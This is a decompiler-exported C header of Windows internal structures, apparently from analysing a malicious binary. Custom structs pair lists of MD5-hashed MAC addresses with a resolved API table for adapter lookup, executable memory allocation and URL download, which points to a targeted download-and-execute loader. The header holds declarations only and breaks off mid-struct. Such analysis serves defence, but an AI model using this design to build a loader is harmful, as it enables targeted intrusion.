typedef unsigned char undefined; typedef unsigned char byte; typedef long long longlong; typedef unsigned char uchar; typedef unsigned int uint; typedef unsigned long ulong; typedef unsigned long long ulonglong; typedef unsigned char undefined1; typedef unsigned short undefined2; typedef unsigned int undefined4; typedef unsigned long long undefined6; typedef unsigned long long undefined8; typedef unsigned short ushort; typedef short wchar_t; typedef struct mac_md5_list_entry_t mac_md5_list_entry_t, *Pmac_md5_list_entry_t; struct mac_md5_list_entry_t { uint count; uint md5mac1[4]; byte padding1[4]; uint md5mac2[4]; byte padding2[4]; }; typedef struct func_ptr_table_t func_ptr_table_t, *Pfunc_ptr_table_t; typedef struct HINSTANCE__ HINSTANCE__, *PHINSTANCE__; typedef struct HINSTANCE__ * HINSTANCE; typedef HINSTANCE HMODULE; typedef wchar_t WCHAR; typedef WCHAR * LPCWSTR; typedef void * HANDLE; typedef ulong DWORD; typedef void * LPVOID; typedef ulong ULONG_PTR; typedef ULONG_PTR SIZE_T; typedef WCHAR * LPWSTR; typedef int WINBOOL; typedef struct _FILETIME _FILETIME, *P_FILETIME; typedef struct _FILETIME * LPFILETIME; typedef struct _FILETIME FILETIME; typedef struct _SYSTEMTIME _SYSTEMTIME, *P_SYSTEMTIME; typedef struct _SYSTEMTIME * LPSYSTEMTIME; typedef ulong size_t; typedef LPVOID HINTERNET; typedef char CHAR; typedef CHAR * LPCSTR; typedef ULONG_PTR DWORD_PTR; typedef DWORD * LPDWORD; typedef ushort WORD; struct _SYSTEMTIME { WORD wYear; WORD wMonth; WORD wDayOfWeek; WORD wDay; WORD wHour; WORD wMinute; WORD wSecond; WORD wMilliseconds; }; struct _FILETIME { DWORD dwLowDateTime; DWORD dwHighDateTime; }; struct HINSTANCE__ { int unused; }; struct func_ptr_table_t { HMODULE (* LoadLibraryExW)(LPCWSTR, HANDLE, DWORD); LPVOID (* VirtualAlloc)(LPVOID, SIZE_T, DWORD, DWORD); DWORD (* GetModuleFileNameW)(HMODULE, LPWSTR, DWORD); WINBOOL (* WritePrivateProfileStringW)(LPCWSTR, LPCWSTR, LPCWSTR, LPCWSTR); void (* GetSystemTimeAsFileTime)(LPFILETIME); WINBOOL (* FileTimeToSystemTime)(FILETIME *, LPSYSTEMTIME); WINBOOL (* VirtualFree)(LPVOID, SIZE_T, DWORD); void * (* memcpy)(void *, void *, size_t); int (* memcmp)(void *, void *, size_t); void * (* memset)(void *, int, size_t); int (* swprintf)(char *, char *, ...); int (* sprintf)(char *, char *, ...); char * (* strncat)(char *, char *, size_t); int MD5Init; int MD5Update; int MD5Final; int GetAdaptersAddresses; HINTERNET (* InternetOpenA)(LPCSTR, DWORD, LPCSTR, LPCSTR, DWORD); HINTERNET (* InternetOpenUrlA)(HINTERNET, LPCSTR, LPCSTR, DWORD, DWORD, DWORD_PTR); WINBOOL (* InternetQueryDataAvailable)(HINTERNET, LPDWORD, DWORD, DWORD_PTR); WINBOOL (* InternetReadFile)(HINTERNET, LPVOID, DWORD, LPDWORD); HMODULE (* field_0x54)(LPCWSTR, HANDLE, DWORD); HMODULE (* field_0x58)(LPCWSTR, HANDLE, DWORD); HMODULE (* field_0x5c)(LPCWSTR, HANDLE, DWORD); HMODULE (* field_0x60)(LPCWSTR, HANDLE, DWORD); }; typedef struct _LDR_DATA_TABLE_ENTRY_0x10 _LDR_DATA_TABLE_ENTRY_0x10, *P_LDR_DATA_TABLE_ENTRY_0x10; typedef struct _LIST_ENTRY _LIST_ENTRY, *P_LIST_ENTRY; typedef struct _UNICODE_STRING _UNICODE_STRING, *P_UNICODE_STRING; typedef union _union_9066 _union_9066, *P_union_9066; typedef struct _ACTIVATION_CONTEXT _ACTIVATION_CONTEXT, *P_ACTIVATION_CONTEXT; typedef struct _LDR_DDAG_NODE _LDR_DDAG_NODE, *P_LDR_DDAG_NODE; typedef struct _LDRP_LOAD_CONTEXT _LDRP_LOAD_CONTEXT, *P_LDRP_LOAD_CONTEXT; typedef struct _RTL_BALANCED_NODE _RTL_BALANCED_NODE, *P_RTL_BALANCED_NODE; typedef union _LARGE_INTEGER _LARGE_INTEGER, *P_LARGE_INTEGER; typedef enum _LDR_DLL_LOAD_REASON { LoadReasonAsDataLoad=6, LoadReasonAsImageLoad=5, LoadReasonDelayloadDependency=3, LoadReasonDynamicForwarderDependency=2, LoadReasonDynamicLoad=4, LoadReasonEnclaveDependency=8, LoadReasonEnclavePrimary=7, LoadReasonStaticDependency=0, LoadReasonStaticForwarderDependency=1, LoadReasonUnknown=9 } _LDR_DLL_LOAD_REASON; typedef struct _struct_9067 _struct_9067, *P_struct_9067; typedef struct _LDR_SERVICE_TAG_RECORD _LDR_SERVICE_TAG_RECORD, *P_LDR_SERVICE_TAG_RECORD; typedef struct _LDRP_CSLIST _LDRP_CSLIST, *P_LDRP_CSLIST; typedef enum _LDR_DDAG_STATE { LdrModulesCondensed=6, LdrModulesInitError=1, LdrModulesInitializing=8, LdrModulesMapped=2, LdrModulesMapping=1, LdrModulesMerged=0, LdrModulesPlaceHolder=0, LdrModulesReadyToInit=7, LdrModulesReadyToRun=9, LdrModulesSnapError=2, LdrModulesSnapped=5, LdrModulesSnapping=4, LdrModulesUnloaded=3, LdrModulesUnloading=4, LdrModulesWaitingForDependencies=3 } _LDR_DDAG_STATE; typedef struct _SINGLE_LIST_ENTRY _SINGLE_LIST_ENTRY, *P_SINGLE_LIST_ENTRY; typedef union _union_9970 _union_9970, *P_union_9970; typedef union _union_9975 _union_9975, *P_union_9975; typedef union _union_1261 _union_1261, *P_union_1261; typedef union anon__struct_9067_bitfield_1 anon__struct_9067_bitfield_1, *Panon__struct_9067_bitfield_1; typedef struct _struct_9972 _struct_9972, *P_struct_9972; typedef struct _struct_1262 _struct_1262, *P_struct_1262; typedef struct _struct_1263 _struct_1263, *P_struct_1263; struct _ACTIVATION_CONTEXT { }; union anon__struct_9067_bitfield_1 { ulong PackagedBinary:1; // : bits 0 ulong MarkedForRemoval:1; // : bits 1 ulong ImageDll:1; // : bits 2 ulong LoadNotificationsSent:1; // : bits 3 ulong TelemetryEntryProcessed:1; // : bits 4 ulong ProcessStaticImport:1; // : bits 5 ulong InLegacyLists:1; // : bits 6 ulong InIndexes:1; // : bits 7 ulong ShimDll:1; // : bits 8 ulong InExceptionTable:1; // : bits 9 ulong ReservedFlags1:2; // : bits 10-11 ulong LoadInProgress:1; // : bits 12 ulong LoadConfigProcessed:1; // : bits 13 ulong EntryProcessed:1; // : bits 14 ulong ProtectDelayLoad:1; // : bits 15 ulong ReservedFlags3:2; // : bits 16-17 ulong DontCallForThreads:1; // : bits 18 ulong ProcessAttachCalled:1; // : bits 19 ulong ProcessAttachFailed:1; // : bits 20 ulong CorDeferredValidate:1; // : bits 21 ulong CorImage:1; // : bits 22 ulong DontRelocate:1; // : bits 23 ulong CorILOnly:1; // : bits 24 ulong ChpeImage:1; // : bits 25 ulong ReservedFlags5:2; // : bits 26-27 ulong Redirected:1; // : bits 28 ulong ReservedFlags6:2; // : bits 29-30 ulong CompatDatabaseProcessed:1; // : bits 31 }; struct _struct_9067 { union anon__struct_9067_bitfield_1 field_0x0; }; union _union_9975 { uchar Red:1; // : bits 0 uchar Balance:2; // : bits 1-2 ulong ParentValue; }; struct _struct_9972 { struct _RTL_BALANCED_NODE * Left; struct _RTL_BALANCED_NODE * Right; }; union _union_9970 { struct _RTL_BALANCED_NODE * Children[2]; struct _struct_9972 field1; }; struct _RTL_BALANCED_NODE { union _union_9970 field_0x0; union _union_9975 field_0x8; }; struct _struct_1262 { ulong LowPart; long HighPart; }; struct _struct_1263 { ulong LowPart; long HighPart; }; union _union_1261 { struct _struct_1262 field0; struct _struct_1263 u; longlong QuadPart; }; struct _LIST_ENTRY { struct _LIST_ENTRY * Flink; struct _LIST_ENTRY * Blink; }; struct _SINGLE_LIST_ENTRY { struct _SINGLE_LIST_ENTRY * Next; }; struct _LDRP_CSLIST { struct _SINGLE_LIST_ENTRY * Tail; }; struct _LDR_DDAG_NODE { struct _LIST_ENTRY Modules; struct _LDR_SERVICE_TAG_RECORD * ServiceTagList; ulong LoadCount; ulong LoadWhileUnloadingCount; ulong LowestLink; struct _LDRP_CSLIST Dependencies; struct _LDRP_CSLIST IncomingDependencies; enum _LDR_DDAG_STATE State; struct _SINGLE_LIST_ENTRY CondenseLink; ulong PreorderNumber; }; union _union_9066 { uchar FlagGroup[4]; ulong Flags; struct _struct_9067 field2; }; struct _UNICODE_STRING { ushort Length; ushort MaximumLength; wchar_t * Buffer; }; union _LARGE_INTEGER { union _union_1261 field0; }; struct _LDR_DATA_TABLE_ENTRY_0x10 { struct _LIST_ENTRY InInitializationOrderLinks; void * DllBase; void * EntryPoint; ulong SizeOfImage; struct _UNICODE_STRING FullDllName; struct _UNICODE_STRING BaseDllName; union _union_9066 field_0x24; ushort ObsoleteLoadCount; ushort TlsIndex; struct _LIST_ENTRY HashLinks; ulong TimeDateStamp; struct _ACTIVATION_CONTEXT * EntryPointActivationContext; void * Lock; struct _LDR_DDAG_NODE * DdagNode; struct _LIST_ENTRY NodeModuleLink; struct _LDRP_LOAD_CONTEXT * LoadContext; void * ParentDllBase; void * SwitchBackContext; struct _RTL_BALANCED_NODE BaseAddressIndexNode; struct _RTL_BALANCED_NODE MappingInfoIndexNode; ulong OriginalBase; long Padding_84; union _LARGE_INTEGER LoadTime; ulong BaseNameHashValue; enum _LDR_DLL_LOAD_REASON LoadReason; ulong ImplicitPathOptions; ulong ReferenceCount; ulong DependentLoadFlags; uchar SigningLevel; char __PADDING__[3]; }; struct _LDR_SERVICE_TAG_RECORD { struct _LDR_SERVICE_TAG_RECORD * Next; ulong ServiceTag; }; struct _LDRP_LOAD_CONTEXT { }; #define MEM_COMMIT 4096 #define PAGE_READWRITE 4 #define PAGE_EXECUTE_READWRITE 64 #define ERROR_BUFFER_OVERFLOW 111 typedef struct _PROCESSOR_NUMBER _PROCESSOR_NUMBER, *P_PROCESSOR_NUMBER; struct _PROCESSOR_NUMBER { ushort Group; uchar Number; uchar Reserved; }; typedef struct _PEB _PEB, *P_PEB; typedef union _union_7907 _union_7907, *P_union_7907; typedef struct _PEB_LDR_DATA _PEB_LDR_DATA, *P_PEB_LDR_DATA; typedef struct _RTL_USER_PROCESS_PARAMETERS _RTL_USER_PROCESS_PARAMETERS, *P_RTL_USER_PROCESS_PARAMETERS; typedef struct _RTL_CRITICAL_SECTION _RTL_CRITICAL_SECTION, *P_RTL_CRITICAL_SECTION; typedef union _SLIST_HEADER _SLIST_HEADER, *P_SLIST_HEADER; typedef union _union_7913 _union_7913, *P_union_7913; typedef union _union_7915 _union_7915, *P_union_7915; typedef union _ULARGE_INTEGER _ULARGE_INTEGER, *P_ULARGE_INTEGER; typedef struct _ACTIVATION_CONTEXT_DATA _ACTIVATION_CONTEXT_DATA, *P_ACTIVATION_CONTEXT_DATA; typedef struct _ASSEMBLY_STORAGE_MAP _ASSEMBLY_STORAGE_MAP, *P_ASSEMBLY_STORAGE_MAP; typedef struct _FLS_CALLBACK_INFO _FLS_CALLBACK_INFO, *P_FLS_CALLBACK_INFO; typedef union _union_7928 _union_7928, *P_union_7928; typedef struct _LEAP_SECOND_DATA _LEAP_SECOND_DATA, *P_LEAP_SECOND_DATA; typedef union _union_7932 _union_7932, *P_union_7932; typedef struct _struct_7908 _struct_7908, *P_struct_7908; typedef struct _CURDIR _CURDIR, *P_CURDIR; typedef struct _RTL_DRIVE_LETTER_CURDIR _RTL_DRIVE_LETTER_CURDIR, *P_RTL_DRIVE_LETTER_CURDIR; typedef struct _RTL_CRITICAL_SECTION_DEBUG _RTL_CRITICAL_SECTION_DEBUG, *P_RTL_CRITICAL_SECTION_DEBUG; typedef union _union_1270 _union_1270, *P_union_1270; typedef struct _struct_7914 _struct_7914, *P_struct_7914; typedef union _union_1318 _union_1318, *P_union_1318; typedef struct _struct_7929 _struct_7929, *P_struct_7929; typedef struct _struct_7933 _struct_7933, *P_struct_7933; typedef union anon__struct_7908_bitfield_1 anon__struct_7908_bitfield_1, *Panon__struct_7908_bitfield_1; typedef struct _STRING _STRING, *P_STRING; typedef struct _struct_1271 _struct_1271, *P_struct_1271; typedef union anon__struct_7914_bitfield_1 anon__struct_7914_bitfield_1, *Panon__struct_7914_bitfield_1; typedef struct _struct_1319 _struct_1319, *P_struct_1319; typedef struct _struct_1320 _struct_1320, *P_struct_1320; typedef union anon__struct_7929_bitfield_1 anon__struct_7929_bitfield_1, *Panon__struct_7929_bitfield_1; typedef union anon__struct_7933_bitfield_1 anon__struct_7933_bitfield_1, *Panon__struct_7933_bitfield_1; union anon__struct_7929_bitfield_1 { ulong HeapTracingEnabled:1; // : bits 0 ulong CritSecTracingEnabled:1; // : bits 1 ulong LibLoaderTracingEnabled:1; // : bits 2 ulong SpareTracingBits:29; // : bits 3-31 }; struct _struct_7929 { union anon__struct_7929_bitfield_1 field_0x0; }; union _union_7928 { ulong TracingFlags; struct _struct_7929 field1; }; union anon__struct_7908_bitfield_1 { uchar ImageUsesLargePages:1; // : bits 0 uchar IsProtectedProcess:1; // : bits 1 uchar IsImageDynamicallyRelocated:1; // : bits 2 uchar SkipPatchingUser32Forwarders:1; // : bits 3 uchar IsPackagedProcess:1; // : bits 4 uchar IsAppContainer:1; // : bits 5 uchar IsProtectedProcessLight:1; // : bits 6 uchar IsLongPathAwareProcess:1; // : bits 7 }; struct _struct_7908 { union anon__struct_7908_bitfield_1 field_0x0; }; union _union_7907 { uchar BitField; struct _struct_7908 field1; }; union anon__struct_7933_bitfield_1 { ulong SixtySecondEnabled:1; // : bits 0 ulong Reserved:31; // : bits 1-31 }; struct _struct_7933 { union anon__struct_7933_bitfield_1 field_0x0; }; union _union_7932 { ulong LeapSecondFlags; struct _struct_7933 field1; }; union anon__struct_7914_bitfield_1 { ulong ProcessInJob:1; // : bits 0 ulong ProcessInitializing:1; // : bits 1 ulong ProcessUsingVEH:1; // : bits 2 ulong ProcessUsingVCH:1; // : bits 3 ulong ProcessUsingFTH:1; // : bits 4 ulong ProcessPreviouslyThrottled:1; // : bits 5 ulong ProcessCurrentlyThrottled:1; // : bits 6 ulong ProcessImagesHotPatched:1; // : bits 7 ulong ReservedBits0:24; // : bits 8-31 }; struct _struct_7914 { union anon__struct_7914_bitfield_1 field_0x0; }; union _union_7913 { ulong CrossProcessFlags; struct _struct_7914 field1; }; struct _struct_1319 { ulong LowPart; ulong HighPart; }; struct _struct_1320 { ulong LowPart; ulong HighPart; }; union _union_1318 { struct _struct_1319 field0; struct _struct_1320 u; ulonglong QuadPart; }; union _ULARGE_INTEGER { union _union_1318 field0; }; union _union_7915 { void * KernelCallbackTable; void * UserSharedInfoPtr; }; struct _PEB { uchar InheritedAddressSpace; uchar ReadImageFileExecOptions; uchar BeingDebugged; union _union_7907 field_0x3; void * Mutant; void * ImageBaseAddress; struct _PEB_LDR_DATA * Ldr; struct _RTL_USER_PROCESS_PARAMETERS * ProcessParameters; void * SubSystemData; void * ProcessHeap; struct _RTL_CRITICAL_SECTION * FastPebLock; union _SLIST_HEADER * AtlThunkSListPtr; void * IFEOKey; union _union_7913 field_0x28; union _union_7915 field_0x2c; ulong SystemReserved; union _SLIST_HEADER * AtlThunkSListPtr32; void * ApiSetMap; ulong TlsExpansionCounter; void * TlsBitmap; ulong TlsBitmapBits[2]; void * ReadOnlySharedMemoryBase; void * SharedData; void * * ReadOnlyStaticServerData; void * AnsiCodePageData; void * OemCodePageData; void * UnicodeCaseTableData; ulong NumberOfProcessors; ulong NtGlobalFlag; long Padding_30; union _LARGE_INTEGER CriticalSectionTimeout; ulong HeapSegmentReserve; ulong HeapSegmentCommit; ulong HeapDeCommitTotalFreeThreshold; ulong HeapDeCommitFreeBlockThreshold; ulong NumberOfHeaps; ulong MaximumNumberOfHeaps; void * * ProcessHeaps; void * GdiSharedHandleTable; void * ProcessStarterHelper; ulong GdiDCAttributeList; struct _RTL_CRITICAL_SECTION * LoaderLock; ulong OSMajorVersion; ulong OSMinorVersion; ushort OSBuildNumber; ushort OSCSDVersion; ulong OSPlatformId; ulong ImageSubsystem; ulong ImageSubsystemMajorVersion; ulong ImageSubsystemMinorVersion; ulong ActiveProcessAffinityMask; ulong GdiHandleBuffer[34]; void * PostProcessInitRoutine; void * TlsExpansionBitmap; ulong TlsExpansionBitmapBits[32]; ulong SessionId; union _ULARGE_INTEGER AppCompatFlags; union _ULARGE_INTEGER AppCompatFlagsUser; void * pShimData; void * AppCompatInfo; struct _UNICODE_STRING CSDVersion; struct _ACTIVATION_CONTEXT_DATA * ActivationContextData; struct _ASSEMBLY_STORAGE_MAP * ProcessAssemblyStorageMap; struct _ACTIVATION_CONTEXT_DATA * SystemDefaultActivationContextData; struct _ASSEMBLY_STORAGE_MAP * SystemAssemblyStorageMap; ulong MinimumStackCommit; struct _FLS_CALLBACK_INFO * FlsCallback; struct _LIST_ENTRY FlsListHead; void * FlsBitmap; ulong FlsBitmapBits[4]; ulong FlsHighIndex; void * WerRegistrationData; void * WerShipAssertPtr; void * pUnused; void * pImageHeaderHash; union _union_7928 field_0x240; long Padding_31; ulonglong CsrServerReadOnlySharedMemoryBase; ulong TppWorkerpListLock; struct _LIST_ENTRY TppWorkerpList; void * WaitOnAddressHashTable[128]; void * TelemetryCoverageHeader; ulong CloudFileFlags; ulong CloudFileDiagFlags; char PlaceholderCompatibilityMode; char PlaceholderCompatibilityModeReserved[7]; struct _LEAP_SECOND_DATA * LeapSecondData; union _union_7932 field_0x474; ulong NtGlobalFlag2; long __PADDING__[1]; }; struct _PEB_LDR_DATA { ulong Length; uchar Initialized; char Padding_32[3]; void * SsHandle; struct _LIST_ENTRY InLoadOrderModuleList; struct _LIST_ENTRY InMemoryOrderModuleList; struct _LIST_ENTRY InInitializationOrderModuleList; void * EntryInProgress; uchar ShutdownInProgress; char Padding_33[3]; void * ShutdownThreadId; }; struct _struct_1271 { struct _SINGLE_LIST_ENTRY Next; ushort Depth; ushort CpuId; }; union _union_1270 { ulonglong Alignment; struct _struct_1271 field1; }; struct _RTL_CRITICAL_SECTION { struct _RTL_CRITICAL_SECTION_DEBUG * DebugInfo; long LockCount; long RecursionCount; void * OwningThread; void * LockSemaphore; ulong SpinCount; }; struct _ACTIVATION_CONTEXT_DATA { }; struct _CURDIR { struct _UNICODE_STRING DosPath; void * Handle; }; struct _STRING { ushort Length; ushort MaximumLength; char * Buffer; }; struct _RTL_DRIVE_LETTER_CURDIR { ushort Flags; ushort Length; ulong TimeStamp; struct _STRING DosPath; }; struct _RTL_USER_PROCESS_PARAMETERS { ulong MaximumLength; ulong Length; ulong Flags; ulong DebugFlags; void * ConsoleHandle; ulong ConsoleFlags; void * StandardInput; void * StandardOutput; void * StandardError; struct _CURDIR CurrentDirectory; struct _UNICODE_STRING DllPath; struct _UNICODE_STRING ImagePathName; struct _UNICODE_STRING CommandLine; void * Environment; ulong StartingX; ulong StartingY; ulong CountX; ulong CountY; ulong CountCharsX; ulong CountCharsY; ulong FillAttribute; ulong WindowFlags; ulong ShowWindowFlags; struct _UNICODE_STRING WindowTitle; struct _UNICODE_STRING DesktopInfo; struct _UNICODE_STRING ShellInfo; struct _UNICODE_STRING RuntimeData; struct _RTL_DRIVE_LETTER_CURDIR CurrentDirectores[32]; ulong EnvironmentSize; ulong EnvironmentVersion; void * PackageDependencyData; ulong ProcessGroupId; ulong LoaderThreads; struct _UNICODE_STRING RedirectionDllName; }; struct _LEAP_SECOND_DATA { uchar Enabled; char Padding_35[3]; ulong Count; union _LARGE_INTEGER Data[1]; }; struct _ASSEMBLY_STORAGE_MAP { }; union _SLIST_HEADER { union _union_1270 field0; }; struct _FLS_CALLBACK_INFO { }; struct _RTL_CRITICAL_SECTION_DEBUG { ushort Type; ushort CreatorBackTraceIndex; struct _RTL_CRITICAL_SECTION * CriticalSection; struct _LIST_ENTRY ProcessLocksList; ulong EntryCount; ulong ContentionCount; ulong Flags; ushort CreatorBackTraceIndexHigh; ushort SpareUSHORT; }; typedef struct _EXCEPTION_REGISTRATION_RECORD _EXCEPTION_REGISTRATION_RECORD, *P_EXCEPTION_REGISTRATION_RECORD; struct _EXCEPTION_REGISTRATION_RECORD { struct _EXCEPTION_REGISTRATION_RECORD * Next; void * Handler; }; typedef struct _LDR_DATA_TABLE_ENTRY _LDR_DATA_TABLE_ENTRY, *P_LDR_DATA_TABLE_ENTRY; typedef struct _LDR_DATA_TABLE_ENTRY LDR_DATA_TABLE_ENTRY; struct _LDR_DATA_TABLE_ENTRY { struct _LIST_ENTRY InLoadOrderLinks; struct _LIST_ENTRY InMemoryOrderLinks; struct _LIST_ENTRY InInitializationOrderLinks; void * DllBase; void * EntryPoint; ulong SizeOfImage; struct _UNICODE_STRING FullDllName; struct _UNICODE_STRING BaseDllName; union _union_9066 field_0x34; ushort ObsoleteLoadCount; ushort TlsIndex; struct _LIST_ENTRY HashLinks; ulong TimeDateStamp; struct _ACTIVATION_CONTEXT * EntryPointActivationContext; void * Lock; struct _LDR_DDAG_NODE * DdagNode; struct _LIST_ENTRY NodeModuleLink; struct _LDRP_LOAD_CONTEXT * LoadContext; void * ParentDllBase; void * SwitchBackContext; struct _RTL_BALANCED_NODE BaseAddressIndexNode; struct _RTL_BALANCED_NODE MappingInfoIndexNode; ulong OriginalBase; long Padding_84; union _LARGE_INTEGER LoadTime; ulong BaseNameHashValue; enum _LDR_DLL_LOAD_REASON LoadReason; ulong ImplicitPathOptions; ulong ReferenceCount; ulong DependentLoadFlags; uchar SigningLevel; char __PADDING__[3]; }; typedef union anon__struct_7764_bitfield_1 anon__struct_7764_bitfield_1, *Panon__struct_7764_bitfield_1; union anon__struct_7764_bitfield_1 { ulong Offset:31; // : bits 0-30 ulong HasRenderingCommand:1; // : bits 31 }; typedef struct _IMAGE_DATA_DIRECTORY _IMAGE_DATA_DIRECTORY, *P_IMAGE_DATA_DIRECTORY; typedef struct _IMAGE_DATA_DIRECTORY IMAGE_DATA_DIRECTORY; struct _IMAGE_DATA_DIRECTORY { ulong VirtualAddress; ulong Size; }; typedef struct _IMAGE_DOS_HEADER _IMAGE_DOS_HEADER, *P_IMAGE_DOS_HEADER; typedef struct _IMAGE_DOS_HEADER IMAGE_DOS_HEADER; typedef struct _IMAGE_NT_HEADERS _IMAGE_NT_HEADERS, *P_IMAGE_NT_HEADERS; typedef struct _IMAGE_FILE_HEADER _IMAGE_FILE_HEADER, *P_IMAGE_FILE_HEADER; typedef struct _IMAGE_FILE_HEADER IMAGE_FILE_HEADER; typedef struct _IMAGE_OPTIONAL_HEADER _IMAGE_OPTIONAL_HEADER, *P_IMAGE_OPTIONAL_HEADER; typedef struct _IMAGE_OPTIONAL_HEADER IMAGE_OPTIONAL_HEADER32; typedef uchar BYTE; // WARNING! conflicting data type names: /winapi_32/IMAGE_DATA_DIRECTORY - /ALL.h/IMAGE_DATA_DIRECTORY struct _IMAGE_DOS_HEADER { ushort e_magic; ushort e_cblp; ushort e_cp; ushort e_crlc; ushort e_cparhdr; ushort e_minalloc; ushort e_maxalloc; ushort e_ss; ushort e_sp; ushort e_csum; ushort e_ip; ushort e_cs; ushort e_lfarlc; ushort e_ovno; ushort e_res[4]; ushort e_oemid; ushort e_oeminfo; ushort e_res2[10]; struct _IMAGE_NT_HEADERS * e_lfanew; }; struct _IMAGE_FILE_HEADER { WORD Machine; WORD NumberOfSections; DWORD TimeDateStamp; DWORD PointerToSymbolTable; DWORD NumberOfSymbols; WORD SizeOfOptionalHeader; WORD Characteristics; }; struct _IMAGE_OPTIONAL_HEADER { WORD Magic; BYTE MajorLinkerVersion; BYTE MinorLinkerVersion; DWORD SizeOfCode; DWORD SizeOfInitializedData; DWORD SizeOfUninitializedData; DWORD AddressOfEntryPoint; DWORD BaseOfCode; DWORD BaseOfData; DWORD ImageBase; DWORD SectionAlignment; DWORD FileAlignment; WORD MajorOperatingSystemVersion; WORD MinorOperatingSystemVersion; WORD MajorImageVersion; WORD MinorImageVersion; WORD MajorSubsystemVersion; WORD MinorSubsystemVersion; DWORD Win32VersionValue; DWORD SizeOfImage; DWORD SizeOfHeaders; DWORD CheckSum; WORD Subsystem; WORD DllCharacteristics; DWORD SizeOfStackReserve; DWORD SizeOfStackCommit; DWORD SizeOfHeapReserve; DWORD SizeOfHeapCommit; DWORD LoaderFlags; DWORD NumberOfRvaAndSizes; IMAGE_DATA_DIRECTORY DataDirectory[16]; }; struct _IMAGE_NT_HEADERS { DWORD Signature; IMAGE_FILE_HEADER FileHeader; IMAGE_OPTIONAL_HEADER32 OptionalHeader; }; typedef struct _GUID _GUID, *P_GUID; struct _GUID { ulong Data1; ushort Data2; ushort Data3; uchar Data4[8]; }; typedef struct _RTL_ACTIVATION_CONTEXT_STACK_FRAME _RTL_ACTIVATION_CONTEXT_STACK_FRAME, *P_RTL_ACTIVATION_CONTEXT_STACK_FRAME; struct _RTL_ACTIVATION_CONTEXT_STACK_FRAME { struct _RTL_ACTIVATION_CONTEXT_STACK_FRAME * Previous; struct _ACTIVATION_CONTEXT * ActivationContext; ulong Flags; }; typedef struct _TEB _TEB, *P_TEB; typedef struct _NT_TIB _NT_TIB, *P_NT_TIB; typedef struct _CLIENT_ID _CLIENT_ID, *P_CLIENT_ID; typedef struct _ACTIVATION_CONTEXT_STACK _ACTIVATION_CONTEXT_STACK, *P_ACTIVATION_CONTEXT_STACK; typedef struct _GDI_TEB_BATCH _GDI_TEB_BATCH, *P_GDI_TEB_BATCH; typedef union _union_7776 _union_7776, *P_union_7776; typedef struct _TEB_ACTIVE_FRAME _TEB_ACTIVE_FRAME, *P_TEB_ACTIVE_FRAME; typedef union _union_7780 _union_7780, *P_union_7780; typedef union _union_7781 _union_7781, *P_union_7781; typedef union _union_9980 _union_9980, *P_union_9980; typedef struct _struct_7764 _struct_7764, *P_struct_7764; typedef struct _struct_7778 _struct_7778, *P_struct_7778; typedef struct _TEB_ACTIVE_FRAME_CONTEXT _TEB_ACTIVE_FRAME_CONTEXT, *P_TEB_ACTIVE_FRAME_CONTEXT; typedef struct _struct_7782 _struct_7782, *P_struct_7782; typedef union anon__struct_7782_bitfield_1 anon__struct_7782_bitfield_1, *Panon__struct_7782_bitfield_1; struct _struct_7778 { uchar ReservedPad0; uchar ReservedPad1; uchar ReservedPad2; uchar IdealProcessor; }; union _union_7776 { struct _PROCESSOR_NUMBER CurrentIdealProcessor; ulong IdealProcessorValue; struct _struct_7778 field2; }; union _union_9980 { void * FiberData; ulong Version; }; struct _NT_TIB { struct _EXCEPTION_REGISTRATION_RECORD * ExceptionList; void * StackBase; void * StackLimit; void * SubSystemTib; union _union_9980 field_0x10; void * ArbitraryUserPointer; struct _NT_TIB * Self; }; struct _CLIENT_ID { void * UniqueProcess; void * UniqueThread; }; struct _struct_7764 { union anon__struct_7764_bitfield_1 field_0x0; }; struct _GDI_TEB_BATCH { struct _struct_7764 field_0x0; ulong HDC; ulong Buffer[310]; }; struct _ACTIVATION_CONTEXT_STACK { struct _RTL_ACTIVATION_CONTEXT_STACK_FRAME * ActiveFrame; struct _LIST_ENTRY FrameListCache; ulong Flags; ulong NextCookieSequenceNumber; ulong StackId; }; union anon__struct_7782_bitfield_1 { ushort SafeThunkCall:1; // : bits 0 ushort InDebugPrint:1; // : bits 1 ushort HasFiberData:1; // : bits 2 ushort SkipThreadAttach:1; // : bits 3 ushort WerInShipAssertCode:1; // : bits 4 ushort RanProcessInit:1; // : bits 5 ushort ClonedThread:1; // : bits 6 ushort SuppressDebugMsg:1; // : bits 7 ushort DisableUserStackWalk:1; // : bits 8 ushort RtlExceptionAttached:1; // : bits 9 ushort InitialThread:1; // : bits 10 ushort SessionAware:1; // : bits 11 ushort LoadOwner:1; // : bits 12 ushort LoaderWorker:1; // : bits 13 ushort SkipLoaderInit:1; // : bits 14 ushort SpareSameTebBits:1; // : bits 15 }; struct _struct_7782 { union anon__struct_7782_bitfield_1 field_0x0; }; union _union_7781 { ushort SameTebFlags; struct _struct_7782 field1; }; union _union_7780 { ushort CrossTebFlags; ushort SpareCrossTebBits:16; // : bits 0-15 }; struct _TEB { struct _NT_TIB NtTib; void * EnvironmentPointer; struct _CLIENT_ID ClientId; void * ActiveRpcHandle; void * ThreadLocalStoragePointer; struct _PEB * ProcessEnvironmentBlock; ulong LastErrorValue; ulong CountOfOwnedCriticalSections; void * CsrClientThread; void * Win32ThreadInfo; ulong User32Reserved[26]; ulong UserReserved[5]; void * WOW32Reserved; ulong CurrentLocale; ulong FpSoftwareStatusRegister; void * ReservedForDebuggerInstrumentation[16]; void * SystemReserved1[26]; char PlaceholderCompatibilityMode; uchar PlaceholderHydrationAlwaysExplicit; char PlaceholderReserved[10]; ulong ProxiedProcessId; struct _ACTIVATION_CONTEXT_STACK _ActivationStack; uchar WorkingOnBehalfTicket[8]; long ExceptionCode; struct _ACTIVATION_CONTEXT_STACK * ActivationContextStackPointer; ulong InstrumentationCallbackSp; ulong InstrumentationCallbackPreviousPc; ulong InstrumentationCallbackPreviousSp; uchar InstrumentationCallbackDisabled; uchar SpareBytes[23]; ulong TxFsContext; struct _GDI_TEB_BATCH GdiTebBatch; struct _CLIENT_ID RealClientId; void * GdiCachedProcessHandle; ulong GdiClientPID; ulong GdiClientTID; void * GdiThreadLocalInfo; ulong Win32ClientInfo[62]; void * glDispatchTable[233]; ulong glReserved1[29]; void * glReserved2; void * glSectionInfo; void * glSection; void * glTable; void * glCurrentRC; void * glContext; ulong LastStatusValue; struct _UNICODE_STRING StaticUnicodeString; wchar_t StaticUnicodeBuffer[261]; char Padding_27[2]; void * DeallocationStack; void * TlsSlots[64]; struct _LIST_ENTRY TlsLinks; void * Vdm; void * ReservedForNtRpc; void * DbgSsReserved[2]; ulong HardErrorMode; void * Instrumentation[9]; struct _GUID ActivityId; void * 